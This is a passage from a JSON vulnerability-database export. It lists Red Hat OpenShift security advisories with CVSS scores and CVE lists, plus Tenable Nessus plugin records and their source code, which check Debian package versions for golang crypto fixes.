info\nquay.io/openshift-release-dev/ocp-release:4.3.40-s390x\nThe image digest is sha256:605ddde0442e604cfe2d6bd1541ce48df5956fe626edf9cc95b1fca75d231b64\n\n(For ppc64le architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.3.40-ppc64le\n\nThe image digest is sha256:d3c9e391c145338eae3feb7f6a4e487dadc8139a353117d642fe686d277bcccc", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-20T21:25:42", "type": "redhat", "title": "(RHSA-2020:4264) Low: OpenShift Container Platform 4.3.40 security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12652", "CVE-2017-18190", "CVE-2018-20843", "CVE-2019-11068", "CVE-2019-11719", "CVE-2019-11727", "CVE-2019-11756", "CVE-2019-12450", "CVE-2019-12749", "CVE-2019-14822", "CVE-2019-14866", "CVE-2019-14973", "CVE-2019-15903", "CVE-2019-16935", "CVE-2019-17006", "CVE-2019-17023", "CVE-2019-17498", "CVE-2019-17546", "CVE-2019-18197", "CVE-2019-19126", "CVE-2019-19956", "CVE-2019-20386", "CVE-2019-20388", "CVE-2019-2974", "CVE-2019-5094", "CVE-2019-5188", "CVE-2019-5482", "CVE-2019-8675", "CVE-2019-8696", "CVE-2020-12243", "CVE-2020-12400", "CVE-2020-12401", "CVE-2020-12402", "CVE-2020-12403", "CVE-2020-12825", "CVE-2020-14352", "CVE-2020-2181", "CVE-2020-2182", "CVE-2020-2224", "CVE-2020-2225", "CVE-2020-2226", "CVE-2020-24750", "CVE-2020-2574", "CVE-2020-2752", "CVE-2020-2780", "CVE-2020-2812", "CVE-2020-6829", "CVE-2020-7595", "CVE-2020-8492", "CVE-2020-9283"], "modified": "2020-10-20T21:47:29", "id": "RHSA-2020:4264", "href": "https://access.redhat.com/errata/RHSA-2020:4264", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T20:40:41", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic (CVE-2020-9283)\n\n* SSL/TLS: CBC padding timing attack (lucky-13) (CVE-2013-0169)\n\n* grafana: XSS vulnerability via a column style on the \"Dashboard > Table Panel\" screen (CVE-2018-18624)\n\n* js-jquery: prototype pollution in object's prototype leading to denial of service or remote code execution or property injection (CVE-2019-11358)\n\n* npm-serialize-javascript: XSS via unsafe characters in serialized regular expressions (CVE-2019-16769)\n\n* kibana: Prototype pollution in TSVB could result in arbitrary code execution (ESA-2020-06) (CVE-2020-7013)\n\n* nodejs-minimist: prototype pollution allows adding or modifying properties of Object.prototype using a constructor or __proto__ payload (CVE-2020-7598)\n\n* npmjs-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser (CVE-2020-7662)\n\n* nodejs-lodash: prototype pollution in zipObjectDeep function (CVE-2020-8203)\n\n* jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method (CVE-2020-11022)\n\n* jQuery: passing HTML containing <option> elements to manipulation methods could result in untrusted code execution (CVE-2020-11023)\n\n* grafana: stored XSS (CVE-2020-11110)\n\n* grafana: XSS annotation popup vulnerability (CVE-2020-12052)\n\n* grafana: XSS via column.title or cellLinkTooltip (CVE-2020-12245)\n\n* nodejs-elliptic: improper encoding checks allows a certain degree of signature malleability in ECDSA signatures (CVE-2020-13822)\n\n* golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash (CVE-2020-14040)\n\n* nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function (CVE-2020-15366)\n\n* openshift/console: text injection on error page via crafted url (CVE-2020-10715)\n\n* kibana: X-Frame-Option not set by default might lead to clickjacking (CVE-2020-10743)\n\n* openshift: restricted SCC allows pods to craft custom network packets (CVE-2020-14336)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-10-27T14:57:54", "type": "redhat", "title": "(RHSA-2020:4298) Moderate: OpenShift Container Platform 4.6.1 image security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0169", "CVE-2016-10739", "CVE-2018-14404", "CVE-2018-14498", "CVE-2018-16890", "CVE-2018-18074", "CVE-2018-18624", "CVE-2018-18751", "CVE-2018-19519", "CVE-2018-20060", "CVE-2018-20337", "CVE-2018-20483", "CVE-2018-20657", "CVE-2018-20852", "CVE-2018-9251", "CVE-2019-1010180", "CVE-2019-1010204", "CVE-2019-11070", "CVE-2019-11236", "CVE-2019-11324", "CVE-2019-11358", "CVE-2019-11459", "CVE-2019-12447", "CVE-2019-12448", "CVE-2019-12449", "CVE-2019-12450", "CVE-2019-12795", "CVE-2019-13232", "CVE-2019-13636", "CVE-2019-13752", "CVE-2019-13753", "CVE-2019-14822", "CVE-2019-14973", "CVE-2019-1547", "CVE-2019-1549", "CVE-2019-1563", "CVE-2019-15718", "CVE-2019-15847", "CVE-2019-16056", "CVE-2019-16769", "CVE-2019-17451", "CVE-2019-18408", "CVE-2019-19126", "CVE-2019-19923", "CVE-2019-19924", "CVE-2019-19925", "CVE-2019-19959", "CVE-2019-3822", "CVE-2019-3823", "CVE-2019-3825", "CVE-2019-3843", "CVE-2019-3844", "CVE-2019-5094", "CVE-2019-5436", "CVE-2019-5481", "CVE-2019-5482", "CVE-2019-5953", "CVE-2019-6237", "CVE-2019-6251", "CVE-2019-6454", "CVE-2019-6706", "CVE-2019-7146", "CVE-2019-7149", "CVE-2019-7150", "CVE-2019-7664", "CVE-2019-7665", "CVE-2019-8457", "CVE-2019-8506", "CVE-2019-8518", "CVE-2019-8523", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8666", "CVE-2019-8671", "CVE-2019-8672", "CVE-2019-8673", "CVE-2019-8675", "CVE-2019-8676", "CVE-2019-8677", "CVE-2019-8679", "CVE-2019-8681", "CVE-2019-8686", "CVE-2019-8687", "CVE-2019-8689", "CVE-2019-8690", "CVE-2019-8696", "CVE-2019-8726", "CVE-2019-8735", "CVE-2019-8768", "CVE-2020-10531", "CVE-2020-10715", "CVE-2020-10743", "CVE-2020-11008", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11110", "CVE-2020-12049", "CVE-2020-12052", "CVE-2020-12245", "CVE-2020-13822", "CVE-2020-14040", "CVE-2020-14336", "CVE-2020-15366", "CVE-2020-15719", "CVE-2020-1712", "CVE-2020-7013", "CVE-2020-7598", "CVE-2020-7662", "CVE-2020-8203", "CVE-2020-8559", "CVE-2020-9283"], "modified": "2020-10-28T00:36:30", "id": "RHSA-2020:4298", "href": "https://access.redhat.com/errata/RHSA-2020:4298", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T20:37:49", "description": "OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.\n\nThis advisory contains the following OpenShift Virtualization 2.6.0 images:\n\nRHEL-8-CNV-2.6\n==============\nkubevirt-cpu-node-labeller-container-v2.6.0-5\nkubevirt-cpu-model-nfd-plugin-container-v2.6.0-5\nnode-maintenance-operator-container-v2.6.0-13\nkubevirt-vmware-container-v2.6.0-5\nvirtio-win-container-v2.6.0-5\nkubevirt-kvm-info-nfd-plugin-container-v2.6.0-5\nbridge-marker-container-v2.6.0-9\nkubevirt-template-validator-container-v2.6.0-9\nkubevirt-v2v-conversion-container-v2.6.0-6\nkubemacpool-container-v2.6.0-13\nkubevirt-ssp-operator-container-v2.6.0-40\nhyperconverged-cluster-webhook-container-v2.6.0-73\nhyperconverged-cluster-operator-container-v2.6.0-73\novs-cni-plugin-container-v2.6.0-10\ncnv-containernetworking-plugins-container-v2.6.0-10\novs-cni-marker-container-v2.6.0-10\ncluster-network-addons-operator-container-v2.6.0-16\nhostpath-provisioner-container-v2.6.0-11\nhostpath-provisioner-operator-container-v2.6.0-14\nvm-import-virtv2v-container-v2.6.0-21\nkubernetes-nmstate-handler-container-v2.6.0-19\nvm-import-controller-container-v2.6.0-21\nvm-import-operator-container-v2.6.0-21\nvirt-api-container-v2.6.0-111\nvirt-controller-container-v2.6.0-111\nvirt-handler-container-v2.6.0-111\nvirt-operator-container-v2.6.0-111\nvirt-launcher-container-v2.6.0-111\ncnv-must-gather-container-v2.6.0-54\nvirt-cdi-importer-container-v2.6.0-24\nvirt-cdi-cloner-container-v2.6.0-24\nvirt-cdi-controller-container-v2.6.0-24\nvirt-cdi-uploadserver-container-v2.6.0-24\nvirt-cdi-apiserver-container-v2.6.0-24\nvirt-cdi-uploadproxy-container-v2.6.0-24\nvirt-cdi-operator-container-v2.6.0-24\nhco-bundle-registry-container-v2.6.0-582\n\nSecurity Fix(es):\n\n* golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic (CVE-2020-9283)\n\n* golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference (CVE-2020-29652)\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)\n\n* golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash (CVE-2020-14040)\n\n* golang: data race in certain net/http servers including ReverseProxy can lead to DoS (CVE-2020-15586)\n\n* golang: ReadUvarint and ReadVarint can read an unlimited number of bytes from invalid inputs (CVE-2020-16845)\n\n* jwt-go: access restriction bypass vulnerability (CVE-2020-26160)\n\n* golang-github-gorilla-websocket: integer overflow leads to denial of service (CVE-2020-27813)\n\n* golang: math/big: panic during recursive division of very large numbers (CVE-2020-28362)\n\n* containernetworking-cni: Arbitrary path injection via type field in CNI configuration (CVE-2021-20206)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-10T08:47:39", "type": "redhat", "title": "(RHSA-2021:0799) Moderate: OpenShift Virtualization 2.6.0 security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10103", "CVE-2018-10105", "CVE-2018-14461", "CVE-2018-14462", "CVE-2018-14463", "CVE-2018-14464", "CVE-2018-14465", "CVE-2018-14466", "CVE-2018-14467", "CVE-2018-14468", "CVE-2018-14469", "CVE-2018-14470", "CVE-2018-14879", "CVE-2018-14880", "CVE-2018-14881", "CVE-2018-14882", "CVE-2018-16227", "CVE-2018-16228", "CVE-2018-16229", "CVE-2018-16230", "CVE-2018-16300", "CVE-2018-16451", "CVE-2018-16452", "CVE-2018-20843", "CVE-2019-11068", "CVE-2019-13050", "CVE-2019-13627", "CVE-2019-14559", "CVE-2019-14889", "CVE-2019-15165", "CVE-2019-15166", "CVE-2019-15903", "CVE-2019-16168", "CVE-2019-16935", "CVE-2019-17450", "CVE-2019-18197", "CVE-2019-19221", "CVE-2019-19906", "CVE-2019-19956", "CVE-2019-20218", "CVE-2019-20387", "CVE-2019-20388", "CVE-2019-20454", "CVE-2019-20807", "CVE-2019-20907", "CVE-2019-20916", "CVE-2019-5018", "CVE-2019-8625", "CVE-2019-8710", "CVE-2019-8720", "CVE-2019-8743", "CVE-2019-8764", "CVE-2019-8766", "CVE-2019-8769", "CVE-2019-8771", "CVE-2019-8782", "CVE-2019-8783", "CVE-2019-8808", "CVE-2019-8811", "CVE-2019-8812", "CVE-2019-8813", "CVE-2019-8814", "CVE-2019-8815", "CVE-2019-8816", "CVE-2019-8819", "CVE-2019-8820", "CVE-2019-8823", "CVE-2019-8835", "CVE-2019-8844", "CVE-2019-8846", "CVE-2020-10018", "CVE-2020-10029", "CVE-2020-11793", "CVE-2020-12321", "CVE-2020-12400", "CVE-2020-12403", "CVE-2020-13630", "CVE-2020-13631", "CVE-2020-13632", "CVE-2020-14040", "CVE-2020-14351", "CVE-2020-14382", "CVE-2020-14391", "CVE-2020-14422", "CVE-2020-15503", "CVE-2020-15586", "CVE-2020-15999", "CVE-2020-16845", "CVE-2020-1730", "CVE-2020-1751", "CVE-2020-1752", "CVE-2020-1971", "CVE-2020-24659", "CVE-2020-25681", "CVE-2020-25682", "CVE-2020-25683", "CVE-2020-25684", "CVE-2020-25685", "CVE-2020-25686", "CVE-2020-25687", "CVE-2020-25705", "CVE-2020-26160", "CVE-2020-27813", "CVE-2020-28362", "CVE-2020-29652", "CVE-2020-29661", "CVE-2020-3862", "CVE-2020-3864", "CVE-2020-3865", "CVE-2020-3867", "CVE-2020-3868", "CVE-2020-3885", "CVE-2020-3894", "CVE-2020-3895", "CVE-2020-3897", "CVE-2020-3899", "CVE-2020-3900", "CVE-2020-3901", "CVE-2020-3902", "CVE-2020-6405", "CVE-2020-6829", "CVE-2020-7595", "CVE-2020-8492", "CVE-2020-8619", "CVE-2020-8622", "CVE-2020-8623", "CVE-2020-8624", "CVE-2020-9283", "CVE-2020-9327", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850", "CVE-2020-9862", "CVE-2020-9893", "CVE-2020-9894", "CVE-2020-9895", "CVE-2020-9915", "CVE-2020-9925", "CVE-2021-20206", "CVE-2021-3121", "CVE-2021-3156"], "modified": "2021-03-10T08:48:38", "id": "RHSA-2021:0799", "href": "https://access.redhat.com/errata/RHSA-2021:0799", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-02-28T12:34:37", "description": "golang-go.crypto was recently updated with a fix for CVE-2020-9283.\nThis in turn requires all packages that use the affected code to be recompiled in order to pick up the security fix.\n\nCVE-2020-9283\n\nSSH signature verification could cause Panic when given invalid Public key.\n\nFor Debian 9 stretch, this problem has been fixed in version 0.3.3-1+deb9u1.\n\nWe recommend that you upgrade your restic packages.\n\nFor the detailed security status of restic please refer to its security tracker page at:\nhttps://security-tracker.debian.org/tracker/restic\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2020-11-17T00:00:00", "type": "nessus", "title": "Debian DLA-2453-1 : restic security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9283"], "modified": "2020-11-19T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:restic", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2453.NASL", "href": "https://www.tenable.com/plugins/nessus/142936", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2453-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(142936);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/19\");\n\n script_cve_id(\"CVE-2020-9283\");\n\n script_name(english:\"Debian DLA-2453-1 : restic security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"golang-go.crypto was recently updated with a fix for CVE-2020-9283.\nThis in turn requires all packages that use the affected code to be\nrecompiled in order to pick up the security fix.\n\nCVE-2020-9283\n\nSSH signature verification could cause Panic when given invalid Public\nkey.\n\nFor Debian 9 stretch, this problem has been fixed in version\n0.3.3-1+deb9u1.\n\nWe recommend that you upgrade your restic packages.\n\nFor the detailed security status of restic please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/restic\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/11/msg00027.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/restic\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/restic\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade the affected restic package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:restic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"restic\", reference:\"0.3.3-1+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-02-28T12:33:07", "description": "golang-go.crypto was recently updated with a fix for CVE-2020-9283.\nThis in turn requires all packages that use the affected code to be recompiled in order to pick up the security fix.\n\nCVE-2020-9283\n\nSSH signature verification could cause Panic when given invalid Public key.\n\nFor Debian 9 stretch, this problem has been fixed in version 0.10.2+dfsg-6+deb9u1.\n\nWe recommend that you upgrade your packer packages.\n\nFor the detailed security status of packer please refer to its security tracker page at:\nhttps://security-tracker.debian.org/tracker/packer\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2020-11-19T00:00:00", "type": "nessus", "title": "Debian DLA-2455-1 : packer security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9283"], "modified": "2020-11-25T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:golang-github-mitchellh-packer-dev", "p-cpe:/a:debian:debian_linux:packer", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2455.NASL", "href": "https://www.tenable.com/plugins/nessus/143109", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2455-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(143109);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/25\");\n\n script_cve_id(\"CVE-2020-9283\");\n\n script_name(english:\"Debian DLA-2455-1 : packer security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"golang-go.crypto was recently updated with a fix for CVE-2020-9283.\nThis in turn requires all packages that use the affected code to be\nrecompiled in order to pick up the security fix.\n\nCVE-2020-9283\n\nSSH signature verification could cause Panic when given invalid Public\nkey.\n\nFor Debian 9 stretch, this problem has been fixed in version\n0.10.2+dfsg-6+deb9u1.\n\nWe recommend that you upgrade your packer packages.\n\nFor the detailed security status of packer please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/packer\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/11/msg00031.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/packer\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/packer\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9283\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:golang-github-mitchellh-packer-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:packer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"golang-github-mitchellh-packer-dev\", reference:\"0.10.2+dfsg-6+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"packer\", reference:\"0.10.2+dfsg-6+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-02-28T12:37:03", "description": "CVE-2019-11840\n\nAn issue was discovered in supplementary Go cryptography libraries, aka golang-googlecode-go-crypto. If more than 256 GiB of keystream is generated, or if the counter otherwise grows greater than 32 bits, the amd64 implementation will first generate incorrect output, and then cycle back to previously generated keystream. Repeated keystream bytes can lead to loss of confidentiality in encryption applications, or to predictability in CSPRNG applications.\n\nCVE-2019-11841\n\nA message-forgery issue was discovered in crypto/openpgp/clearsign/clearsign.go in supplementary Go cryptography libraries. The 'Hash' Armor Header specifies the message digest algorithm(s) used for the signature. Since the library skips Armor Header parsing in general, an attacker can not only embed arbitrary Armor Headers, but also prepend arbitrary text to cleartext messages without invalidating the signatures.\n\nCVE-2020-9283\n\ngolang.org/x/crypto allows a panic during signature verification in the golang.org/x/crypto/ssh package. A client can attack an SSH server that accepts public keys. Also, a server can attack any SSH client.\n\nFor Debian 9 stretch, these problems have been fixed in version 1:0.0~git20170407.0.55a552f+REALLY.0.0~git20161012.0.5f31782-1+deb8u1.\n\nWe recommend that you upgrade your golang-go.crypto packages.\n\nFor the detailed security status of golang-go.crypto please refer to its security tracker page at:\nhttps://security-tracker.debian.org/tracker/golang-go.crypto\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2020-10-08T00:00:00", "type": "nessus", "title": "Debian DLA-2402-1 : golang-go.crypto security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11840", "CVE-2019-11841", "CVE-2020-9283"], "modified": "2020-10-12T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:golang-go.crypto-dev", "p-cpe:/a:debian:debian_linux:golang-golang-x-crypto-dev", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2402.NASL", "href": "https://www.tenable.com/plugins/nessus/141271", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The 